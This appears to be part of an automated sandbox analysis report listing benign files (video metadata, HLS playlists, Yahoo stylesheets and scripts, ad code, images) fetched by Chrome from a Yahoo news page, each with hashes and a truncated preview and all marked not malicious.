                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):6872
                                                                                                                                                                                                                  Entropy (8bit):5.903108760695961
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:7B9ACADAB5F8A0C591941785F5E1A867
                                                                                                                                                                                                                  SHA1:F2AEA681680D0AF3E0D0D95AFE9FF2297528B139
                                                                                                                                                                                                                  SHA-256:FF731E31DF4DAB81915E55D3565A1857A8DA4DEF2345D774F1428B78AF339E12
                                                                                                                                                                                                                  SHA-512:E6F51DBAFCCCEFB501E30B0EE683E094B7D06C683E64BFDD5E3B8FC6E43496606F6506B6F496D51B0FAF7408079B5B59641E25C99D3BA48597F4FF5198329D75
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"query":{"results":{"mediaObj":[{"id":"f0262557-5186-3d6e-913d-df2cba992b2f","meta":{"attribution":"","description":"18-year-old Sam Dutcher says his SUV malfunctioned while driving in rural Minnesota and caused him to lose control of the car at speeds reaching 113 mph. Dutcher is safe thanks to quick-thinking state patrol officers.","title":"Officer tells driver in out-of-control car to crash into him","genre":"","embed_rights":false,"duration":75,"url":"https://www.yahoo.com/news/officer-tells-driver-control-car-113111408.html","thumbnail":"https://s.yimg.com/uu/api/res/1.2/EEhMEMajzouGr62KXxLQRA--~B/Zmk9c3RyaW07aD0yMjY7dz00MDE7c209MTthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/cnn_videos_177/2b33a43611ff23744b84f32e94939209","create_date":"2024-10-03T12:09:37Z","provider":{"provider_id":"cnn_videos_177","provider_video_id":"https://www.cnn.com/2024/10/03/us/video/teen-driver-suv-police-crash-digvid","name":"CNN","url":"https://www.cnn.com/","logourl":"","publisher_id":"e695711
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (893)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7107
                                                                                                                                                                                                                  Entropy (8bit):5.210490286879741
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:64F8FEEC41F4CA0E2DE88CEE998139F8
                                                                                                                                                                                                                  SHA1:21C5D29B33D6491C0D219C230F8424DC0419E9DB
                                                                                                                                                                                                                  SHA-256:E9E3BBA96A4CED4272B00263135151AE335AEE0F0CBCA783152368FBE8325FFF
                                                                                                                                                                                                                  SHA-512:0E81815F816FA25209B80CD45F8717615A917B4B5D2880FC2BBF9377768F4284E12D170677241129AE53E88A3D0AE17271AD55EAA47950C4080265B9D8272877
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://manifest.prod.boltdns.net/manifest/v1/hls/v4/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/facdab7a-7629-4f80-9d4f-6355b5f33bd4/6s/rendition.m3u8?fastly_token=NjcwMDU2NzdfZDQ4MWFlNjYzYzdjZGY5YTJhZGFlYTljYmU1ZWU2ZGZkNWZmZGMzZWQ3ZWNmZmZjOWM1MjkzNGUyYzQ0N2YxMw%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ
                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:3.#EXT-X-KEY:METHOD=AES-128,URI="https://manifest.prod.boltdns.net/license/v1/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/d9935f8c-bc8c-465d-90ed-e5c8188bebe4?fastly_token=NjcwMDU2NzdfNjFhMDg0ODBiOGI0MTg2MGU5NzdmYmMzNjdiMjEzMzMxMGQwMTMxMWJlMjk3Y2Y4YzJhYmY4ZDZiOWZlNDUyOA%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ",IV=0x8bf6581f699ea3f24a2bb95f02148be2.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-TARGETDURATION:6.#EXTINF:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40540)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):680964
                                                                                                                                                                                                                  Entropy (8bit):5.640355385959759
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A574D5F41701E6569EF2E0410FFEB516
                                                                                                                                                                                                                  SHA1:F0B0A087AAB181773E5C19207AE113A7A4C6771D
                                                                                                                                                                                                                  SHA-256:63D2E1D31FDB908A7CE8AC1E7B4E4CDE389EF5B699F12C56EE42FA9D314DB16A
                                                                                                                                                                                                                  SHA-512:A50662D498F4A3211BDAE8B7864635534FD1647EA0720F3D427DF8E7EA24739B84B4FCF878F5955787161DD086D8E7298939946719CEC038228730DC12044F2E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/wm/mbr/417c13362de753a4f8f06cd156a39e0bdde8a888/yahoo-main.css
                                                                                                                                                                                                                  Preview:@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-ExtraLight.woff) format("woff");font-weight:200;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.eot);src:url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.eot?#iefix) format("embedded-opentype"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.woff2) format("woff2"),url(https://s.yimg.com/cv/ae/sports/fonts/2017/Yahoo_Sans-Light.woff) format("woff");font-weight:300;font-style:normal}@font-face{font-family:"Yahoo Sans";font-display:block;src:url(https://s.yimg.com/cv/ae/sports/f
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1246
                                                                                                                                                                                                                  Entropy (8bit):5.219513736674568
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AC8C4FBEDA6EFAD9549CB41B992A8B3A
                                                                                                                                                                                                                  SHA1:46F532F081AF894297BCE53A7D212E2D253A60BF
                                                                                                                                                                                                                  SHA-256:11B4310DF6E27428E7CF86F316ABDC10148AC5CF3C8BBBD5B85C88B9F6290C59
                                                                                                                                                                                                                  SHA-512:0D82A3ACB37B93D05692F677F31F7A381C4D17D21E665504E9E1DC7745EDAE2AC89AD23C8A32E8954431C9BA97B015E340D8FD7AC35CF96DD569A4303591013E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/wm/mbr/images/checkbox-checked.svg
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="16px" height="16px" viewBox="0 0 16 16" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 59 (86127) - https://sketch.com -->. <title>Tick_Checkbox_Yes</title>. <desc>Created with Sketch.</desc>. <g id="Account-Access" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="User-Name_Desktop_02-Copy-3" transform="translate(-24.000000, -336.000000)">. <g id="Tick_Checkbox_Yes" transform="translate(24.000000, 336.000000)">. <rect id="Rectangle" stroke="#B9BDC5" x="0.5" y="0.5" width="15" height="15" rx="2"></rect>. <path d="M3.16749976,8.35860496 C2.94416675,8.13860527 2.94416675,7.77971689 3.16749976,7.55749498 C3.39027723,7.33693974 3.75194338,7.33693974 3.9752764,7.55749498 L6.2919398,9.85471396 L12.0241539,4.1658331 C12.2480425,3.9447223 12.6091531,3.9447223 12.8319306,4.1658331 C13.0558191,4.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16545)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):26028
                                                                                                                                                                                                                  Entropy (8bit):5.122368948706005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:C167CC2C7C7EC850A0A7092688FF129D
                                                                                                                                                                                                                  SHA1:7D4E39EECA3CE2AE523CD0888C53EEAD24369CA6
                                                                                                                                                                                                                  SHA-256:A11EA647F95A0F0AFED52714B759929C5C8CBFD789A4F1B6B55D7D75A46433E3
                                                                                                                                                                                                                  SHA-512:AB3C82EADC889D0112DD80B9C19345FDD5654BD6726789D743DF940A40813638F1F4EE93F6D32A495C9CD9CAA1CC095C3FC83C407331A935D7126E75574BBFC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/videojs-bc-playlist-ui/5.1.1/videojs-bc-playlist-ui.min.js
                                                                                                                                                                                                                  Preview:/*! @name @brightcove/videojs-bc-playlist-ui @version 5.1.1 @license UNLICENSED */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("video.js"),require("@brightcove/loscore")):"function"==typeof define&&define.amd?define(["video.js","@brightcove/loscore"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).videojsBcPlaylistUi=e(t.videojs,t.videojs.bc_)}(this,(function(t,e){"use strict";function s(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var i=s(t),n=s(e);let l=t=>{const e=t.playlist.autoadvance_;e.timeout&&t.clearTimeout(e.timeout),e.trigger&&t.off("ended",e.trigger),e.timeout=null,e.trigger=null};const a=(t,e)=>{var s;(l(t),"number"==typeof(s=e)&&!isNaN(s)&&s>=0&&s<1/0)?(t.playlist.autoadvance_.delay=e,t.playlist.autoadvance_.trigger=function(){const s=()=>a(t,e);t.one("play",s),t.playlist.autoadvance_.timeout=t.setTimeout((()=>{l(t),t.off("play",s),t.playlist.next()}),1e3*e)},t.one("ended",t.playlist.autoadvance_.tr
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):131804
                                                                                                                                                                                                                  Entropy (8bit):5.38264782828823
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:8D23B3B40232C8A0DD0EE4AF487CE3F6
                                                                                                                                                                                                                  SHA1:00BD88E981995D4F29624F711E95B5922F966C12
                                                                                                                                                                                                                  SHA-256:2D8D8B1CC5DDF4A5E1EC47114294B3EAD3328A934BE21BA73D97C8CCAC29838F
                                                                                                                                                                                                                  SHA-512:5AD88CCCC1C934176EE9963C40A125903DB2FE2D29E95C43C9A3CC9DDE3AB8948F4003C01A7BEA788E454979DD417F4EDE0677B11F70AE38306DD5CB365C5081
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/oa/consent.js
                                                                                                                                                                                                                  Preview:/*! For license information please see consent.js.LICENSE.txt */.!function(){var e={6848:function(e,n,t){var o,i,a;!function(s){"use strict";if(null!=n&&"number"!=typeof n.nodeType)e.exports=s();else if(null!=t.amdO)i=[],void 0===(a="function"==typeof(o=s)?o.apply(n,i):o)||(e.exports=a);else{var r=s(),c="undefined"!=typeof self?self:$.global;"function"!=typeof c.btoa&&(c.btoa=r.btoa),"function"!=typeof c.atob&&(c.atob=r.atob)}}((function(){"use strict";var e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function n(e){this.message=e}return n.prototype=new Error,n.prototype.name="InvalidCharacterError",{btoa:function(t){for(var o,i,a=String(t),s=0,r=e,c="";a.charAt(0|s)||(r="=",s%1);c+=r.charAt(63&o>>8-s%1*8)){if((i=a.charCodeAt(s+=3/4))>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|i}return c},atob:function(t){var o=String(t).replace(/[=]+$/,"");if(o.length%4==1)throw new n("'atob' failed: The str
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4816)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):211246
                                                                                                                                                                                                                  Entropy (8bit):5.4333828604572165
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:963090F0C2A563C3110987B4769F5785
                                                                                                                                                                                                                  SHA1:FCB1C8084A1F5EFDB680E2BA268AF753356509E0
                                                                                                                                                                                                                  SHA-256:B0088124EDC0322D5CC6C4385CA59C018CEB76790C907D13F1EE5BE3DCC1A039
                                                                                                                                                                                                                  SHA-512:03A87D3A2B65E95F003A07A6EE9875D344B3D48A0BBD38466159EE0FE0E1DAADD67CC5465BA7F50EF8B92EE72D373920A70747B3581B1386AB5942252CA6C7B2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                                                                                                                  Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.ug=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.ug};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (893)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7107
                                                                                                                                                                                                                  Entropy (8bit):5.197907993906051
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AA9F1CDEB36F173BB780436C0B8CBBEE
                                                                                                                                                                                                                  SHA1:614873BEB177553AD0C625AA5EE70EAB25F4E7B3
                                                                                                                                                                                                                  SHA-256:2F04A37C988080184AE1ACBEC2F580AFDE063CA2770C3AA54A1731F1650AA1DA
                                                                                                                                                                                                                  SHA-512:8E4A4E759C66CB660FCFC3433FCD20F01E709F0EDAD6797602769F617EC0D7CDD55C15596D2CCCB083ED385F0689987584EA64D4604BC484A3794A51535972DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:3.#EXT-X-KEY:METHOD=AES-128,URI="https://manifest.prod.boltdns.net/license/v1/aes128/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/d9935f8c-bc8c-465d-90ed-e5c8188bebe4?fastly_token=NjcwMDU2NzdfNjFhMDg0ODBiOGI0MTg2MGU5NzdmYmMzNjdiMjEzMzMxMGQwMTMxMWJlMjk3Y2Y4YzJhYmY4ZDZiOWZlNDUyOA%3D%3D&bcov_auth=eyJhbGciOiJSUzI1NiJ9.eyJhY2NpZCI6IjY0MTU2NjU4MTUwMDEiLCJhdWQiOlsicGxheWJhY2suYXBpLmJyaWdodGNvdmUuY29tIl0sInBraWQiOiI5MjE4NDMyMC04ZmYzLTQ1ZTktYjYwMC05OTBmODIyYzg2NjciLCJleHAiOjE3MjgwNTMwOTQsImlhdCI6MTcyODA1Mjc5NH0.P_N1csFdXh8Ns9i7OSTfiDOpM-6jeDJ5F71Ovd-LRHSg0XTQm_KG2axeK-PrgfXOLuaVU1pxCvDw9HlTSmJA688eG4BF29834YK6ZyInrp3AmJ9kl9zA6FWjBU2B50gl8Xvtb6baYQqZO1khmo9xIvIsjozGtaL2GHvTwgC1NJdZHib-INaSwQhZ49zxaE19I0Qv7yuVNbdI4kLakOq1p_n26A7WAev-CoKiKyObUiGqMv-VPeSiODvHHhv3HVCNUwEucbONPRHIEMSPnDz82E5SXoLdP_pVkPx_Enmnhp2k1uAG536A2fZdcSA6iFIbr5CGrlcOwPJwR5aVUyBFXQ",IV=0x8bf6581f699ea3f24a2bb95f02148be2.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-TARGETDURATION:6.#EXTINF:
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29594), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):29594
                                                                                                                                                                                                                  Entropy (8bit):5.176931694017593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AD4B4808C249D200DF8BCDB043AC4611
                                                                                                                                                                                                                  SHA1:80F6F690F592E8E1975CB27B9281B6F49FA81C66
                                                                                                                                                                                                                  SHA-256:117A49648BFB149AE0636D4C6397DADBE8AAAB4EE5BB8A35DB9318379B7F6CA2
                                                                                                                                                                                                                  SHA-512:BD1124DD9EADDB5B10AAF23C4D270C06A4FF98C15542F38D7C878EE7DD4947EC42FB54838A5B8E2F3C5D80B0086503CE16BBB157F630C517998EA1646C05234E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-autocomplete-1.31.8-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-autocomplete",[],t):"object"==typeof exports?exports["wafer-autocomplete"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-autocomplete"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(i){if(a[i])return a[i].exports;var n=a[i]={i:i,l:!1,exports:{}};return e[i].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i=window.webpackJsonpwafer_wafers_wafer_autocomplete;window.webpackJsonpwafer_wafers_wafer_autocomplete=function(t,a,r){for(var o,s,l=0,u=[];l<t.length;l++)s=t[l],n[s]&&u.push(n[s][0]),n[s]=0;for(o in a)Object.prototype.hasOwnProperty.call(a,o)&&(e[o]=a[o]);for(i&&i(t,a,r);u.length;)u.shift()()};var a={},n={1:0,2:0};return t.e=function(e){function i(){s.onerror=s.onload=null,clearTimeout(l);var t=n[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),n[e]=void 0)}var a=n[
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):4116
                                                                                                                                                                                                                  Entropy (8bit):7.947744647311718
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9800313C1AA0F453E9B7C5AE8CF66E7D
                                                                                                                                                                                                                  SHA1:6BC66CFC7273216087AE966EBF98B5880034F697
                                                                                                                                                                                                                  SHA-256:F40DD0F6E5154CA9E85DC8444D156C1726C221544E78233244125DD0D7E6AB5B
                                                                                                                                                                                                                  SHA-512:E541070B0340BD3FD8B7BDEA791BD919EF524E3567A85BF9BD9CD1366F6F77847EA203D298B1242CCDB6FA49D67B954AA295CB7B80E6147EA58873893EB333FC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/C7uqQDlXIL_7aVaep3TayQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/36cbd510-824f-11ef-bbd8-bd5ab8486217.cf.webp
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....pw...*d...>y8.H$....R.aP..gnB.... .i..?...+.'...uY....K.g*..a...1....''...:..;d.5@...P.3z...!."..P.M......).....|.7x....3......o(DFT...O....0.......q..:8..i.f.$.h...7Y.#..0...+.\.#6.o..B..".].\N..m....h/.>.p..-..wju.}..L.v.r<...c$.....1..K..^l......&2..=4...$.]...e....~.........>...u...I.<.K..S..-5.\...2cU......}..~?....[3..[!.[t....;.=.. ../......~.xd...;.......lj..FP..=i%.........D._..1.#{..5...a..Z@....#.X.Y.$sgP6-<...B..g.w:c.]...#x...AM....5#Z.IL....!|..+.c...i?.....#2g..u8x.............#[....U.A.H.F.....%.NG....|.N.S....P. ...V..x}..zX..q.jd..k[....{.W.Q;.....Vq+....X.)n..G-.....j.dWL...rm.]......r..R..H..Xd....@E..w...,....1.,.[..ilz..F..ve4=..}.E..nZ..)...F.|B*....:.d.).....+t.c...Fu..k..j4..^..I.....a...M6`_...u]?..?.j..Q.../...R..u..|2se.........*.F.../.\........hdJ........0..u.V:..azI..6.yrc.@[..F.(SD*,....&g{. ..n.]%.@.F......gu....+G...Y.k.G.........H........Y....s..j*.0.fy[k..t."........\...+...x...
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16314
                                                                                                                                                                                                                  Entropy (8bit):7.926552419167923
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F7B7EE2330265209FEBF723C2DD1E043
                                                                                                                                                                                                                  SHA1:4B118EA512190454CBFF1A882C5648B882F4E551
                                                                                                                                                                                                                  SHA-256:045D1CCE033F47EC5F2D9496625E13512F6EF69B90FA45A7BD1D24AA4CC42A02
                                                                                                                                                                                                                  SHA-512:CAC06A828B53030675E49F5680BD6E222E59481C28A6C476909491AA771019CEF48227F35E93580AF3B1F660B41646E3A8781083876835CB6D6A5A02F6ED6806
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C.........................................................................d............................................B.........................!..1A."Qa.q..2....#3BRb.....$r.C..S.....................................3.........................!1.."A..Q#23Ba..q....$Cr............?..zq.....].L...2.cK..R.!.......WqS..."t1y..u.X.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):235662
                                                                                                                                                                                                                  Entropy (8bit):4.879849036009606
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:87D9F989FBD1FE1F2D06130DF2DDD991
                                                                                                                                                                                                                  SHA1:49C25F5DA5A6FBF36D6AB0F10D163E777234FD65
                                                                                                                                                                                                                  SHA-256:FB7265BCE07F553CC1ABE0295A4608A4CAD6C1E4736FB3102174DC7570BC8BAB
                                                                                                                                                                                                                  SHA-512:5B135230069771F17E11EF7642EAC5AEAB50E9C97855564499DC2E0BB6BAF5FC39395559EEE12E000E0806228C07A45EA414D1BFAF06BE9134844FF7FACD8750
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/c/49c25f5.caas-news_web.min.css
                                                                                                                                                                                                                  Preview:@keyframes slideUp{0%{transform:translateY(200%)}to{transform:translateY(0)}}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}@keyframes show-success-message{0%{opacity:0;transform:translateY(10px)}80%{opacity:1;transform:translateY(0)}to{opacity:0;transform:translateY(-10px)}}@keyframes immersive-share-appear-in{0%{opacity:0}to{opacity:1}}@keyframes fade{0%{opacity:1}to{opacity:0}}@keyframes shine{0%,to{opacity:1}50%{opacity:.5}}@keyframes wave{0%,60%,to{transform:initial}30%{transform:translateY(-4px)}}@keyframes inlineXrayTooltipFadeIn{0%{opacity:0}to{opacity:1}}@keyframes liveBadgePulse{0%{transform:scale(.43,.43);opacity:1}to{transform:scale(1,1);opacity:0}}@keyframes ellipsesAnimation{0%,30.43%{content:"."}34.78%,65.21%{content:".."}69.56%,to{content:"..."}}@keyframes loader-animate{0%{transform:translate3d(-100%,0,0)}to{transform:translate3d(100%,0,0)}}@font-face{font-family:"YahooSerifDisplay";src:local("Yahoo Serif Display"),url(https://s.yimg.com/cv/apiv2/default
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16798), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16798
                                                                                                                                                                                                                  Entropy (8bit):5.223409253489215
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F085D6C42ACB1394E457E463230DE8BA
                                                                                                                                                                                                                  SHA1:DEACA09E50FB2D08C90F07CC588A8B1B4C191732
                                                                                                                                                                                                                  SHA-256:F2C2013A67C8DD205E93EF40CF60DA7B3BB48A075E7B649FDE2B2F646B15896F
